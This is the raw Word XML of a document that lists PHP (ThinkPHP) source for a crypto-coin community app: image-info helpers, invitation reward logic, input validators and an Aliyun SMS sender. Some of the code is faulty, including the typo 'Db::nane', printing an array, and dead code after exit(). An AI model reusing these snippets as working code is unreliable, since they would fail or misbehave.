    </w:p>
    <w:p w14:paraId="35B7A37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1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6107325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$imgtype = "GIF";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C234E8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21898FB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2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AB8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$imgtype = "JPG";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462AE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8DCA4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case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13988D8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$imgtype = "PNG";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79F5D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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D920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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC987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$img_type = $imgtype . "</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B32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$img_size = ceil(filesize($img) / 1000) . "k"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68874FA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$new_img_info = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06F0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"width" =&gt; $img_info[0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67384D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"height" =&gt; $img_info[1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E9E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 =&gt; $img_type,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBB3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"size" =&gt; $img_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7309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43D3C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 width";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FBF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$img_info[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D98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 height";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE2D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$img_info[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485BEF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 format";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2EE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$img_type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B4B9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 size";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B35DB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$img_size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C32822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print $new_img_info;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B73A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85A8C2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_imgHouZhui($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE7E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$img=strstr($img,'.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B17C84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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6BFE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2BFD140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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F647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if($img=='.gif'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A51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false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFD7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9EF8D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61F1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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133CB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B0D5B3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_yaoqing($uid,$s1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A71422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 || !$s1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060448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D680BD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B9B67B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$s1=Db::name('yaoqing')-&gt;where(['uid'=&gt;$s1])-&gt;value('uid');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E68F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if(!$s1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B622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1E60D50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03D907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$time=time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380BDA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Db::name('yaoqing')-&gt;insert(['uid'=&gt;$uid,'s1'=&gt;$s1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B9C5A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Db::name('yaoqing')-&gt;where('uid',$s1)-&gt;setInc('tudi_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E034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$yaoqing=config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0245C3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if($yaoqing['money_yaoqing']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49671F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14235D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$uid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDE1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1459B70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$yaoqing['money_yaoqing']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CE3C5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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邀请码注册</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED98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FEFA27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673769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3D6F9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 xml:space="preserve">    if($yaoqing['money_yaoqing_s1']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7930ED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_moneyDb([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65198EB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'uid'   =&gt;  $s1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20859A5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407EBF7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'money'     =&gt;  $yaoqing['money_yaoqing_s1']*100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59850DF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   =&gt;  'id:'.$uid.'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>成功邀请徒弟</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60761B6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2E06AB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0EAEFA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FF8B3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631C93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if(!$uid || !$s1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44F3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22362E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39D36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$yaoqing=config()['yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112F2DC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if($yaoqing['money_yaoqing']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FCB0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$where['money']=$yaoqing['money_yaoqing']*100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A12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948BB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$where['uid']=$uid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FF6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$where['s1']=$s1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6D673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$db=Db::nane('yaoqing')-&gt;insert(['uid'=&gt;$uid,'s1'=&gt;$s1,'money'=&gt;0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121CB3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if($db){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D8A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Db::name('yaoqing')-&gt;where('uid',$uid)-&gt;setInc('tudi_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8A4AF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06A17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$db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111B7E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FC98DD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function _moban(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025402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return 'toutiao';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF17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29FE77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app\api\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22286A1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037B7A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Coin extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B5C4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3BAF22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48CD352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['coin','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币字段必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C8F9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5C9CF1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BD6EE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F89CD9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app\api\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A01E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3DC5950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Page extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF2568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6EEF3D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6B1684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'token|Token'                    =&gt;        'max:128',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F392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'pages|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页记录条数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'              =&gt;        'number|between:1,100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703734D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'page|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页数</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'                      =&gt;        'number|gt:0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F241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8BFAE6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C920B7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79CFC0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app\api\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217209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3C4B3E9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Market extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DADF8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062272A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7295670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['exchange','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F5DA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44D79F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F097D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4A17624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app\api\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E234AE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2AFDC1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Remarks extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E806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5757F1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63CC4E1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['token','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDCED8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['base','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟币为必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499007D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58A844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E0052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D6455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app\api\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2B7E4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6897DA5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Circle extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0C53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6BB18B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12AEF0E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'title|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5BB2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'type_id|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID' =&gt; 'require|number',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DC566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'img|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区图标</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECAA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'content|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>描述说明</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' =&gt; 'require|max:100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3944AA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1A56CB5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0EC452D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1CAA50A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app\api\validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4F50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0697F5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Coinfollow extends Validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA42E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4B944A4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protected $rule = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F370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['token','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请先登录</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2041C3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['symbol','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FF2E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['alert1','float','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C8D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['alert2','float','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>价格格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB92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p>
    <w:p w14:paraId="394EE0C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2211126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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FB951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namespace app\api\model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659287F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think\Validate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4177D47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think\Db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1DE39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use think\Loader;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1115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class Send extends \think\Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F214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7713497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sms($data=[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F739A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5C6B44E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$validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E79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['param','require|array','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必须为数组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B6D79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['mobile','require|/1\d{10}$/','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26799CF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ab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>['template','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228772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414B9F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 (!$validate-&gt;check($data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D209BC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$validate-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703BDD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25959CB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$config = Db::name('member_config')-&gt;where('type','sdkMobile')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA159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$sdkAppkey=$config[0]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="530BE88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$sdkSecretKey=$config[1]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE52BD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$sdkQianming=$config[2]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF769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$sdkReg=$config[3]['text'];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p>
    <w:p w14:paraId="7604CA5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$sdkPwd=$config[4]['text'];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p>
    <w:p w14:paraId="30D2EC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$sdkMobile=$config[5]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6B2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include EXTEND_PATH.'sms/sdkcore/Config.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB85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Loader::import('sms.Dysmsapi.Request.V20170525.SendSmsRequest');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FB8B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Loader::import('sms.Dysmsapi.Request.V20170525.QuerySendDetailsRequest');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DD7F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$accessKeyId = $sdkAppkey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622DAE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$accessKeySecret =$sdkSecretKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02347D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$product = "Dysmsapi";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CFB4C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$domain = "dysmsapi.aliyuncs.com";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6558162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$region = "cn-hangzhou";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56ECC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$profile = \sms\sdkcore\Profile\DefaultProfile::getProfile($region, $accessKeyId, $accessKeySecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C645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\sms\sdkcore\Profile\DefaultProfile::addEndpoint("cn-hangzhou", "cn-hangzhou", $product, $domain);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565AD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$acsClient= new \sms\sdkcore\DefaultAcsClient($profile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB2FF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 = new \sms\Dysmsapi\Request\V20170525\SendSmsRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB80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$request-&gt;setPhoneNumbers($data['mobile']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7CA4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$request-&gt;setSignName($sdkQianming);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B36D1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$request-&gt;setTemplateCode($data['template']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C4F2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$request-&gt;setTemplateParam(json_encode($data['param']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4026C3B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$acsResponse = $acsClient-&gt;getAcsResponse($request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30520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if($acsResponse-&gt;Message=='OK'){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC78FA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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DE49C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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1A19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$acsResponse-&gt;Message;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356154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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203187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exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE019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if(isset($result['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920DE6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$result['sub_code'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0093F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4A3A662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return true;</w:t>
      </w:r>
    </w:p>
